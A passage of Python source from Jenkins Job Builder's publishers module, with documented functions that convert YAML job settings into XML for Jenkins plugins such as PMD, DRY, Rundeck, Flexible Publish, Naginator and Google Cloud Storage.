for threshold in ['unstable', 'failed']:
dthreshold = dthresholds.get(threshold, {})
threshold = threshold.replace('failed', 'fail')
XML.SubElement(p, '%sThresholdInvalidReadWrite' % threshold).text \
= str(dthreshold.get('invalid-read-write', ''))
XML.SubElement(p, '%sThresholdDefinitelyLost' % threshold).text \
= str(dthreshold.get('definitely-lost', ''))
XML.SubElement(p, '%sThresholdTotal' % threshold).text \
= str(dthreshold.get('total', ''))
XML.SubElement(p, 'failBuildOnMissingReports').text = str(
data.get('fail-no-reports', False)).lower()
XML.SubElement(p, 'failBuildOnInvalidReports').text = str(
data.get('fail-invalid-reports', False)).lower()
XML.SubElement(p, 'publishResultsForAbortedBuilds').text = str(
data.get('publish-if-aborted', False)).lower()
XML.SubElement(p, 'publishResultsForFailedBuilds').text = str(
data.get('publish-if-failed', False)).lower()
def pmd(parser, xml_parent, data):
"""yaml: pmd
Publish trend reports with PMD.
Requires the Jenkins :jenkins-wiki:`PMD Plugin <PMD+Plugin>`.
The PMD component accepts a dictionary with the following values:
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/pmd001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/pmd002.yaml
:language: yaml
"""
xml_element = XML.SubElement(xml_parent, 'hudson.plugins.pmd.PmdPublisher')
helpers.build_trends_publisher('[PMD] ', xml_element, data)
def scan_build(parser, xml_parent, data):
"""yaml: scan-build
Publishes results from the Clang scan-build static analyzer.
The scan-build report has to be generated in the directory
``${WORKSPACE}/clangScanBuildReports`` for the publisher to find it.
Requires the Jenkins :jenkins-wiki:`Clang Scan-Build Plugin
<Clang+Scan-Build+Plugin>`.
:arg bool mark-unstable: Mark build as unstable if the number of bugs
exceeds a threshold (default false)
:arg int threshold: Threshold for marking builds as unstable (default 0)
:arg string exclude-paths: Comma separated paths to exclude from reports
(>=1.5) (default '')
:arg string report-folder: Folder where generated reports are located
(>=1.7) (default 'clangScanBuildReports')
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/scan-build-full.yaml
:language: yaml
Minimal Example:
.. literalinclude::
/../../tests/publishers/fixtures/scan-build-minimal.yaml
:language: yaml
"""
p = XML.SubElement(
xml_parent,
'jenkins.plugins.clangscanbuild.publisher.ClangScanBuildPublisher')
p.set('plugin', 'clang-scanbuild')
mappings = [
('mark-unstable', 'markBuildUnstableWhenThresholdIsExceeded', False),
('threshold', 'bugThreshold', 0),
('exclude-paths', 'clangexcludedpaths', ''),
('report-folder', 'reportFolderName', 'clangScanBuildReports'),
]
helpers.convert_mapping_to_xml(p, data, mappings, fail_required=True)
def dry(parser, xml_parent, data):
"""yaml: dry
Publish trend reports with DRY.
Requires the Jenkins :jenkins-wiki:`DRY Plugin <DRY+Plugin>`.
The DRY component accepts a dictionary with the following values:
:arg str pattern: Report filename pattern (default '')
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (default '')
:arg int unhealthy: Stormy threshold (default '')
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg int high-threshold: Minimum number of duplicated lines for high
priority warnings. (default 50)
:arg int normal-threshold: Minimum number of duplicated lines for normal
priority warnings. (default 25)
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (default '')
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/dry001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/dry004.yaml
:language: yaml
"""
xml_element = XML.SubElement(xml_parent, 'hudson.plugins.dry.DryPublisher')
helpers.build_trends_publisher('[DRY] ', xml_element, data)
# Add specific settings for this trends publisher
settings = [
('high-threshold', 'highThreshold', 50),
('normal-threshold', 'normalThreshold', 25)]
helpers.convert_mapping_to_xml(
xml_element, data, settings, fail_required=True)
def shining_panda(parser, xml_parent, data):
"""yaml: shining-panda
Publish coverage.py results. Requires the Jenkins
:jenkins-wiki:`ShiningPanda Plugin <ShiningPanda+Plugin>`.
:arg str html-reports-directory: path to coverage.py html results
(optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/shiningpanda001.yaml
:language: yaml
"""
shining_panda_plugin = XML.SubElement(
xml_parent,
'jenkins.plugins.shiningpanda.publishers.CoveragePublisher')
if 'html-reports-directory' in data:
XML.SubElement(shining_panda_plugin, 'htmlDir').text = str(
data['html-reports-directory'])
def downstream_ext(parser, xml_parent, data):
"""yaml: downstream-ext
Trigger multiple downstream jobs when a job is completed and
condition is met.
Requires the Jenkins :jenkins-wiki:`Downstream-Ext Plugin
<Downstream-Ext+Plugin>`.
:arg list projects: Projects to build (required)
:arg string condition: comparison condition used for the criteria.
One of 'equal-or-over', 'equal-or-under', 'equal'
(default 'equal-or-over')
:arg string criteria: Trigger downstream job if build results meets
condition. One of 'success', 'unstable', 'failure' or
'aborted' (default 'success')
:arg bool only-on-scm-change: Trigger only if downstream project
has SCM changes (default false)
:arg bool only-on-local-scm-change: Trigger only if current project
has SCM changes (default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/downstream-ext002.yaml
:language: yaml
"""
conditions = {
"equal-or-over": "AND_HIGHER",
"equal-or-under": "AND_LOWER",
"equal": "EXACT"
}
p = XML.SubElement(xml_parent,
'hudson.plugins.downstream__ext.DownstreamTrigger')
if 'projects' not in data:
raise JenkinsJobsException("Missing list of downstream projects.")
XML.SubElement(p, 'childProjects').text = ','.join(data['projects'])
th = XML.SubElement(p, 'threshold')
criteria = data.get('criteria', 'success').upper()
if criteria not in hudson_model.THRESHOLDS:
raise JenkinsJobsException("criteria must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
wr_threshold = hudson_model.THRESHOLDS[
criteria]
XML.SubElement(th, "name").text = wr_threshold['name']
XML.SubElement(th, "ordinal").text = wr_threshold['ordinal']
XML.SubElement(th, "color").text = wr_threshold['color']
XML.SubElement(th, "completeBuild").text = str(
wr_threshold['complete']).lower()
condition = data.get('condition', 'equal-or-over')
if condition not in conditions:
raise JenkinsJobsException('condition must be one of: %s' %
", ".join(conditions))
XML.SubElement(p, 'thresholdStrategy').text = conditions[
condition]
XML.SubElement(p, 'onlyIfSCMChanges').text = str(
data.get('only-on-scm-change', False)).lower()
XML.SubElement(p, 'onlyIfLocalSCMChanges').text = str(
data.get('only-on-local-scm-change', False)).lower()
def rundeck(parser, xml_parent, data):
"""yaml: rundeck
Trigger a rundeck job when the build is complete.
Requires the Jenkins :jenkins-wiki:`RunDeck
Plugin <RunDeck+Plugin>`.
:arg str job-id: The RunDeck job identifier. (required)
This could be:
* ID example : "42"
* UUID example : "2027ce89-7924-4ecf-a963-30090ada834f"
* reference, in the format : "project:group/job"
:arg str options: List of options for the Rundeck job, in Java-Properties
format: key=value (default "")
:arg str node-filters: List of filters to optionally filter the nodes
included by the job. (default "")
:arg str tag: Used for on-demand job scheduling on rundeck: if a tag is
specified, the job will only execute if the given tag is present in the
SCM changelog. (default "")
:arg bool wait-for-rundeck: If true Jenkins will wait for the job to
complete, if false the job will be started and Jenkins will move on.
(default false)
:arg bool fail-the-build: If true a RunDeck job failure will cause the
Jenkins build to fail. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/rundeck001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/rundeck002.yaml
:language: yaml
"""
p = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.rundeck.RundeckNotifier')
mappings = [
('job-id', 'jobId', None),
('options', 'options', ''),
('node-filters', 'nodeFilters', ''),
('tag', 'tag', ''),
('wait-for-rundeck', 'shouldWaitForRundeckJob', False),
('fail-the-build', 'shouldFailTheBuild', False),
]
helpers.convert_mapping_to_xml(p, data, mappings, fail_required=True)
def create_publishers(parser, action):
dummy_parent = XML.Element("dummy")
parser.registry.dispatch('publisher', parser, dummy_parent, action)
return list(dummy_parent)
def conditional_publisher(parser, xml_parent, data):
"""yaml: conditional-publisher
Conditionally execute some post-build steps. Requires the Jenkins
:jenkins-wiki:`Flexible Publish Plugin <Flexible+Publish+Plugin>`.
A Flexible Publish list of Conditional Actions is created in Jenkins.
:arg str condition-kind: Condition kind that must be verified before the
action is executed. Valid values and their additional attributes are
described in the conditions_ table.
:arg str on-evaluation-failure: What should be the outcome of the build
if the evaluation of the condition fails. Possible values are `fail`,
`mark-unstable`, `run-and-mark-unstable`, `run` and `dont-run`.
Default is `fail`.
:arg list action: Action to run if the condition is verified. Item
can be any publisher known by Jenkins Job Builder and supported
by the Flexible Publish Plugin.
.. _conditions:
================== ====================================================
Condition kind Description
================== ====================================================
always Condition is always verified
never Condition is never verified
boolean-expression Run the action if the expression expands to a
representation of true
:condition-expression: Expression to expand
current-status Run the action if the current build status is
within the configured range
:condition-worst: Accepted values are SUCCESS,
UNSTABLE, FAILURE, NOT_BUILD, ABORTED
:condition-best: Accepted values are SUCCESS,
UNSTABLE, FAILURE, NOT_BUILD, ABORTED
shell Run the action if the shell command succeeds
:condition-command: Shell command to execute
windows-shell Similar to shell, except that commands will be
executed by cmd, under Windows
:condition-command: Command to execute
regexp Run the action if a regular expression matches
:condition-expression: Regular Expression
:condition-searchtext: Text to match against
the regular expression
file-exists Run the action if a file exists
:condition-filename: Check existence of this file
:condition-basedir: If condition-filename is
relative, it will be considered relative to
either `workspace`, `artifact-directory`,
or `jenkins-home`. Default is `workspace`.
================== ====================================================
Single Conditional Action Example:
.. literalinclude:: \
/../../tests/publishers/fixtures/conditional-publisher001.yaml
:language: yaml
Multiple Conditional Actions Example
(includes example of multiple actions per condition which requires
v0.13 or higher of the Flexible Publish plugin):
.. literalinclude:: \
/../../tests/publishers/fixtures/conditional-publisher003.yaml
:language: yaml
:download:`Multiple Conditional Actions Example for pre-v0.13 versions
<../../tests/publishers/fixtures/conditional-publisher002.yaml>`
"""
def publish_condition(cdata):
kind = cdata['condition-kind']
ctag = XML.SubElement(cond_publisher, condition_tag)
class_pkg = 'org.jenkins_ci.plugins.run_condition'
if kind == "always":
ctag.set('class',
class_pkg + '.core.AlwaysRun')
elif kind == "never":
ctag.set('class',
class_pkg + '.core.NeverRun')
elif kind == "boolean-expression":
ctag.set('class',
class_pkg + '.core.BooleanCondition')
XML.SubElement(ctag, "token").text = cdata['condition-expression']
elif kind == "current-status":
ctag.set('class',
class_pkg + '.core.StatusCondition')
wr = XML.SubElement(ctag, 'worstResult')
wr_name = cdata['condition-worst']
if wr_name not in hudson_model.THRESHOLDS:
raise JenkinsJobsException(
"threshold must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
wr_threshold = hudson_model.THRESHOLDS[wr_name]
XML.SubElement(wr, "name").text = wr_threshold['name']
XML.SubElement(wr, "ordinal").text = wr_threshold['ordinal']
XML.SubElement(wr, "color").text = wr_threshold['color']
XML.SubElement(wr, "completeBuild").text = \
str(wr_threshold['complete']).lower()
br = XML.SubElement(ctag, 'bestResult')
br_name = cdata['condition-best']
if br_name not in hudson_model.THRESHOLDS:
raise JenkinsJobsException(
"threshold must be one of %s" %
", ".join(hudson_model.THRESHOLDS.keys()))
br_threshold = hudson_model.THRESHOLDS[br_name]
XML.SubElement(br, "name").text = br_threshold['name']
XML.SubElement(br, "ordinal").text = br_threshold['ordinal']
XML.SubElement(br, "color").text = br_threshold['color']
XML.SubElement(br, "completeBuild").text = \
str(wr_threshold['complete']).lower()
elif kind == "shell":
ctag.set('class',
class_pkg + '.contributed.ShellCondition')
XML.SubElement(ctag, "command").text = cdata['condition-command']
elif kind == "windows-shell":
ctag.set('class',
class_pkg + '.contributed.BatchFileCondition')
XML.SubElement(ctag, "command").text = cdata['condition-command']
elif kind == "regexp":
ctag.set('class',
class_pkg + '.core.ExpressionCondition')
XML.SubElement(ctag,
"expression").text = cdata['condition-expression']
XML.SubElement(ctag, "label").text = cdata['condition-searchtext']
elif kind == "file-exists":
ctag.set('class',
class_pkg + '.core.FileExistsCondition')
XML.SubElement(ctag, "file").text = cdata['condition-filename']
basedir = cdata.get('condition-basedir', 'workspace')
basedir_tag = XML.SubElement(ctag, "baseDir")
if "workspace" == basedir:
basedir_tag.set('class',
class_pkg + '.common.BaseDirectory$Workspace')
elif "artifact-directory" == basedir:
basedir_tag.set('class',
class_pkg + '.common.'
'BaseDirectory$ArtifactsDir')
elif "jenkins-home" == basedir:
basedir_tag.set('class',
class_pkg + '.common.'
'BaseDirectory$JenkinsHome')
else:
raise JenkinsJobsException('%s is not a valid condition-kind '
'value.' % kind)
def publish_action(parent, action):
for edited_node in create_publishers(parser, action):
if not use_publisher_list:
edited_node.set('class', edited_node.tag)
edited_node.tag = 'publisher'
parent.append(edited_node)
flex_publisher_tag = 'org.jenkins__ci.plugins.flexible__publish.' \
'FlexiblePublisher'
cond_publisher_tag = 'org.jenkins__ci.plugins.flexible__publish.' \
'ConditionalPublisher'
root_tag = XML.SubElement(xml_parent, flex_publisher_tag)
publishers_tag = XML.SubElement(root_tag, "publishers")
condition_tag = "condition"
evaluation_classes_pkg = 'org.jenkins_ci.plugins.run_condition'
evaluation_classes = {
'fail': evaluation_classes_pkg + '.BuildStepRunner$Fail',
'mark-unstable': evaluation_classes_pkg +
'.BuildStepRunner$Unstable',
'run-and-mark-unstable': evaluation_classes_pkg +
'.BuildStepRunner$RunUnstable',
'run': evaluation_classes_pkg + '.BuildStepRunner$Run',
'dont-run': evaluation_classes_pkg + '.BuildStepRunner$DontRun',
}
for cond_action in data:
cond_publisher = XML.SubElement(publishers_tag, cond_publisher_tag)
publish_condition(cond_action)
evaluation_flag = cond_action.get('on-evaluation-failure', 'fail')
if evaluation_flag not in evaluation_classes.keys():
raise JenkinsJobsException('on-evaluation-failure value '
'specified is not valid. Must be one '
'of: %s' % evaluation_classes.keys())
evaluation_class = evaluation_classes[evaluation_flag]
XML.SubElement(cond_publisher, "runner").set('class',
evaluation_class)
if 'action' in cond_action:
actions = cond_action['action']
action_parent = cond_publisher
plugin_info = \
parser.registry.get_plugin_info("Flexible Publish Plugin")
version = pkg_resources.parse_version(plugin_info.get('version',
'0'))
# XML tag changed from publisher to publisherList in v0.13
# check the plugin version to determine further operations
use_publisher_list = version >= pkg_resources.parse_version("0.13")
if use_publisher_list:
action_parent = XML.SubElement(cond_publisher, 'publisherList')
else:
# Check the length of actions list for versions prior to 0.13.
# Flexible Publish will overwrite action if more than one is
# specified. Limit the action list to one element.
if len(actions) is not 1:
raise JenkinsJobsException("Only one action may be "
"specified for each condition.")
for action in actions:
publish_action(action_parent, action)
else:
raise JenkinsJobsException('action must be set for each condition')
def scoverage(parser, xml_parent, data):
"""yaml: scoverage
Publish scoverage results as a trend graph.
Requires the Jenkins :jenkins-wiki:`Scoverage Plugin <Scoverage+Plugin>`.
:arg str report-directory: This is a directory that specifies the locations
where the xml scoverage report is generated (required)
:arg str report-file: This is a file name that is given to the xml
scoverage report (required)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/scoverage001.yaml
:language: yaml
"""
scoverage = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.scoverage.ScoveragePublisher')
scoverage.set('plugin', 'scoverage')
mappings = [
('report-directory', 'reportDir', None),
('report-file', 'reportFile', None),
]
helpers.convert_mapping_to_xml(
scoverage, data, mappings, fail_required=True)
def display_upstream_changes(parser, xml_parent, data):
"""yaml: display-upstream-changes
Display SCM changes of upstream jobs. Requires the Jenkins
:jenkins-wiki:`Display Upstream Changes Plugin
<Display+Upstream+Changes+Plugin>`.
Example:
.. literalinclude:: \
/../../tests/publishers/fixtures/display-upstream-changes.yaml
"""
XML.SubElement(
xml_parent,
'jenkins.plugins.displayupstreamchanges.'
'DisplayUpstreamChangesRecorder')
def gatling(parser, xml_parent, data):
"""yaml: gatling
Publish gatling results as a trend graph
Requires the Jenkins :jenkins-wiki:`Gatling Plugin <Gatling+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/gatling001.yaml
:language: yaml
"""
gatling = XML.SubElement(
xml_parent,
'io.gatling.jenkins.GatlingPublisher')
XML.SubElement(gatling, 'enabled').text = 'true'
def logstash(parser, xml_parent, data):
"""yaml: logstash
Send job's console log to Logstash for processing and analyis of
your job data. Also stores test metrics from Junit.
Requires the Jenkins :jenkins-wiki:`Logstash Plugin <Logstash+Plugin>`.
:arg num max-lines: The maximum number of log lines to send to Logstash.
( default 1000 )
:arg bool fail-build: Mark build as failed if this step fails.
( default false )
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/logstash-min.yaml
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/logstash-full.yaml
"""
logstash = XML.SubElement(xml_parent,
'jenkins.plugins.logstash.LogstashNotifier')
XML.SubElement(logstash, 'maxLines').text = str(
data.get('max-lines', 1000))
XML.SubElement(logstash, 'failBuild').text = str(
data.get('fail-build', False))
def image_gallery(parser, xml_parent, data):
"""yaml: image-gallery
Produce an image gallery using Javascript library. Requires the Jenkins
:jenkins-wiki:`Image Gallery Plugin<Image+Gallery+Plugin>`.
:arg str gallery-type:
:gallery-type values:
* **archived-images-gallery** (default)
* **in-folder-comparative-gallery**
* **multiple-folder-comparative-gallery**
:arg str title: gallery title (optional)
:arg int image-width: width of the image (optional)
:arg bool unstable-if-no-artifacts: mark build as unstable
if no archived artifacts were found (default false)
:arg str includes: include pattern (valid for archived-images-gallery
gallery)
:arg str base-root-folder: base root dir (valid for comparative gallery)
:arg int image-inner-width: width of the image displayed in the inner
gallery popup (valid for comparative gallery, optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/image-gallery001.yaml
"""
def include_comparative_elements(gallery_parent_elem, gallery):
XML.SubElement(gallery_parent_elem, 'baseRootFolder').text = str(
gallery.get('base-root-folder', ''))
image_inner_width = gallery.get('image-inner-width', '')
if image_inner_width:
XML.SubElement(gallery_parent_elem, 'imageInnerWidth').text = str(
image_inner_width)
package_prefix = 'org.jenkinsci.plugins.imagegallery.'
builder = XML.SubElement(
xml_parent, package_prefix + 'ImageGalleryRecorder'
)
image_galleries = XML.SubElement(builder, 'imageGalleries')
galleries = {
'archived-images-gallery': package_prefix + 'imagegallery.'
'ArchivedImagesGallery',
'in-folder-comparative-gallery': package_prefix + 'comparative.'
'InFolderComparativeArchivedImagesGallery',
'multiple-folder-comparative-gallery': package_prefix + 'comparative.'
'MultipleFolderComparativeArchivedImagesGallery'
}
for gallery_def in data:
gallery_type = gallery_def.get('gallery-type',
'archived-images-gallery')
if gallery_type not in galleries:
raise InvalidAttributeError('gallery-type', gallery_type,
galleries.keys())
gallery_config = XML.SubElement(
image_galleries, galleries[gallery_type])
XML.SubElement(gallery_config, 'title').text = str(
gallery_def.get('title', ''))
image_width = str(gallery_def.get('image-width', ''))
if image_width:
XML.SubElement(gallery_config, 'imageWidth').text = str(
image_width)
XML.SubElement(
gallery_config,
'markBuildAsUnstableIfNoArchivesFound').text = str(gallery_def.get(
'unstable-if-no-artifacts', False))
if gallery_type == 'archived-images-gallery':
XML.SubElement(gallery_config, 'includes').text = str(
gallery_def.get('includes', ''))
if gallery_type == 'in-folder-comparative-gallery':
include_comparative_elements(gallery_config, gallery_def)
if gallery_type == 'multiple-folder-comparative-gallery':
include_comparative_elements(gallery_config, gallery_def)
def naginator(parser, xml_parent, data):
"""yaml: naginator
Automatically reschedule a build after a build failure
Requires the Jenkins :jenkins-wiki:`Naginator Plugin <Naginator+Plugin>`.
:arg bool rerun-unstable-builds: Rerun build for unstable builds as well
as failures (default false)
:arg bool rerun-matrix-part: Rerun build only for failed parts on the
matrix (>=1.12) (default false)
:arg int fixed-delay: Fixed delay before retrying build (cannot be used
with progressive-delay-increment or progressive-delay-maximum.
This is the default delay type. (default 0)
:arg int progressive-delay-increment: Progressive delay before retrying
build increment (cannot be used when fixed-delay is being used)
(default 0)
:arg int progressive-delay-maximum: Progressive delay before retrying
maximum delay (cannot be used when fixed-delay is being used)
(default 0)
:arg int max-failed-builds: Maximum number of successive failed builds
(default 0)
:arg str regular-expression: Only rerun build if regular expression is
found in output (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/naginator001.yaml
:language: yaml
"""
naginator = XML.SubElement(
xml_parent,
'com.chikli.hudson.plugin.naginator.NaginatorPublisher')
XML.SubElement(naginator, 'regexpForRerun').text = str(
data.get('regular-expression', ''))
XML.SubElement(naginator, 'checkRegexp').text = str(
'regular-expression' in data).lower()
XML.SubElement(naginator, 'rerunIfUnstable').text = str(
data.get('rerun-unstable-builds', False)).lower()
XML.SubElement(naginator, 'rerunMatrixPart').text = str(
data.get('rerun-matrix-part', False)).lower()
progressive_delay = ('progressive-delay-increment' in data or
'progressive-delay-maximum' in data)
if 'fixed-delay' in data and progressive_delay:
raise JenkinsJobsException("You cannot specify both fixed "
"and progressive delays")
if not progressive_delay:
delay = XML.SubElement(
naginator,
'delay',
{'class': 'com.chikli.hudson.plugin.naginator.FixedDelay'})
XML.SubElement(delay, 'delay').text = str(
data.get('fixed-delay', '0'))
else:
delay = XML.SubElement(
naginator,
'delay',
{'class': 'com.chikli.hudson.plugin.naginator.ProgressiveDelay'})
XML.SubElement(delay, 'increment').text = str(
data.get('progressive-delay-increment', '0'))
XML.SubElement(delay, 'max').text = str(
data.get('progressive-delay-maximum', '0'))
XML.SubElement(naginator, 'maxSchedule').text = str(
data.get('max-failed-builds', '0'))
def disable_failed_job(parser, xml_parent, data):
"""yaml: disable-failed-job
Automatically disable failed jobs.
Requires the Jenkins :jenkins-wiki:`Disable Failed Job Plugin
<Disable+Failed+Job+Plugin>`.
:arg str when-to-disable: The condition to disable the job. (required)
Possible values are
* **Only Failure**
* **Failure and Unstable**
* **Unstable**
:arg int no-of-failures: Number of consecutive failures to disable the
job. (optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/disable-failed-job001.yaml
:language: yaml
"""
xml_element = XML.SubElement(xml_parent, 'disableFailedJob.'
'disableFailedJob.DisableFailedJob',
{'plugin': 'disable-failed-job'})
valid_conditions = ['Only Failure',
'Failure and Unstable',
'Only Unstable']
try:
disable_condition = str(data['when-to-disable'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
if disable_condition not in valid_conditions:
raise InvalidAttributeError('when-to-disable', disable_condition,
valid_conditions)
XML.SubElement(xml_element, 'whenDisable').text = disable_condition
if 'no-of-failures' in data:
XML.SubElement(xml_element, 'failureTimes').text = str(data.get(
'no-of-failures'))
XML.SubElement(xml_element, 'optionalBrockChecked').text = 'true'
else:
XML.SubElement(xml_element, 'optionalBrockChecked').text = 'false'
def google_cloud_storage(parser, xml_parent, data):
"""yaml: google-cloud-storage
Upload build artifacts to Google Cloud Storage. Requires the
Jenkins :jenkins-wiki:`Google Cloud Storage plugin
<Google+Cloud+Storage+Plugin>`.
Apart from the Google Cloud Storage Plugin itself, installation of Google
OAuth Credentials and addition of required credentials to Jenkins is
required.
:arg str credentials-id: The set of Google credentials registered with
the Jenkins Credential Manager for authenticating
with your project. (required)
:arg list uploads:
:uploads:
* **expiring-elements** (`dict`)
:params:
* **bucket-name** (`str`) bucket name to upload artifacts
(required)
* **days-to-retain** (`int`) days to keep artifacts
(required)
* **build-log** (`dict`)
:params:
* **log-name** (`str`) name of the file that the Jenkins
console log to be named (required)
* **storage-location** (`str`) bucket name to upload
artifacts (required)
* **share-publicly** (`bool`) whether to share uploaded
share uploaded artifacts with everyone (default false)
* **upload-for-failed-jobs** (`bool`) whether to upload
artifacts even if the build fails (default false)
* **show-inline** (`bool`) whether to show uploaded build
log inline in web browsers, rather than forcing it to be
downloaded (default true)
* **strip-prefix** (`str`) strip this prefix off the
file names (default not set)
* **classic** (`dict`)
:params:
* **file-pattern** (`str`) ant style globs to match the
files to upload (required)
* **storage-location** (`str`) bucket name to upload
artifacts (required)
* **share-publicly** (`bool`) whether to share uploaded
share uploaded artifacts with everyone (default false)
* **upload-for-failed-jobs** (`bool`) whether to upload
artifacts even if the build fails (default false)
* **show-inline** (`bool`) whether to show uploaded
artifacts inline in web browsers, rather than forcing
them to be downloaded (default false)
* **strip-prefix** (`str`) strip this prefix off the
file names (default not set)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/google_cloud_storage001.yaml
:language: yaml
Full example:
.. literalinclude::
/../../tests/publishers/fixtures/google_cloud_storage002.yaml
:language: yaml
"""
def expiring_elements(properties, upload_element, types):
"""Handle expiring elements upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.'
'jenkins.plugins.storage.'
'ExpiringBucketLifecycleManager')
if 'bucket-name' not in properties:
raise MissingAttributeError('bucket-name')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['bucket-name'])
XML.SubElement(xml_element, 'sharedPublicly').text = 'false'
XML.SubElement(xml_element, 'forFailedJobs').text = 'false'
if types.count('expiring-elements') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.ExpiringBucketLifecycleManager/module'})
else:
XML.SubElement(xml_element, 'module')
if 'days-to-retain' not in properties:
raise MissingAttributeError('days-to-retain')
XML.SubElement(xml_element, 'bucketObjectTTL').text = str(
properties['days-to-retain'])
def build_log(properties, upload_element, types):
"""Handle build log upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.jenkins.'
'plugins.storage.StdoutUpload')
if 'storage-location' not in properties:
raise MissingAttributeError('storage-location')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['storage-location'])
XML.SubElement(xml_element, 'sharedPublicly').text = str(
properties.get('share-publicly', False)).lower()
XML.SubElement(xml_element, 'forFailedJobs').text = str(
properties.get('upload-for-failed-jobs', False)).lower()
XML.SubElement(xml_element, 'showInline').text = str(
properties.get('show-inline', True)).lower()
XML.SubElement(xml_element, 'pathPrefix').text = str(
properties.get('strip-prefix', ''))
if types.count('build-log') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.StdoutUpload/module'})
else:
XML.SubElement(xml_element, 'module')
if 'log-name' not in properties:
raise MissingAttributeError('log-name')
XML.SubElement(xml_element, 'logName').text = str(
properties['log-name'])
def classic(properties, upload_element, types):
"""Handle classic upload action
"""
xml_element = XML.SubElement(upload_element, 'com.google.jenkins.'
'plugins.storage.ClassicUpload')
if 'storage-location' not in properties:
raise MissingAttributeError('storage-location')
XML.SubElement(xml_element, 'bucketNameWithVars').text = str(
properties['storage-location'])
XML.SubElement(xml_element, 'sharedPublicly').text = str(
properties.get('share-publicly', False)).lower()
XML.SubElement(xml_element, 'forFailedJobs').text = str(
properties.get('upload-for-failed-jobs', False)).lower()
XML.SubElement(xml_element, 'showInline').text = str(
properties.get('show-inline', False)).lower()
XML.SubElement(xml_element, 'pathPrefix').text = str(
properties.get('strip-prefix', ''))
if types.count('classic') > 1:
XML.SubElement(xml_element, 'module',
{'reference': '../../com.google.jenkins.plugins.'
'storage.ClassicUpload/module'})
else:
XML.SubElement(xml_element, 'module')
if 'file-pattern' not in properties:
raise MissingAttributeError('file-pattern')
XML.SubElement(xml_element, 'sourceGlobWithVars').text = str(
properties['file-pattern'])
uploader = XML.SubElement(xml_parent,
'com.google.jenkins.plugins.storage.'
'GoogleCloudStorageUploader',
{'plugin': 'google-storage-plugin'})
try:
credentials_id = str(data['credentials-id'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
XML.SubElement(uploader, 'credentialsId').text = credentials_id
